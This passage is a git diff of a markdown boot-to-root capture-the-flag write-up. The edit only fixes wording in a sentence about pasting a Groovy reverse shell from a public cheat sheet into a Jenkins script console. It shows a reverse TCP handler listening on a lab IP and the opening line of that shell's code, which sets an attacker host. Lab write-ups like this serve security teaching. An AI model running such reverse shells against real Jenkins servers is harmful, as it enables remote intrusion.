PacketFire/packetfire_site/content/post/internal-boot2root-writeup.md

 [*] Started reverse TCP handler on 10.10.253.137:4444
 ```

-I also prepared an example shell from [payload all the things](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#groovy) which i pmupt into the groovy script console of jenkins.
+I also prepared an example shell from [payload all the things](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#groovy) which entered into the groovy script console of jenkins.

 ```
 String host="10.10.253.137";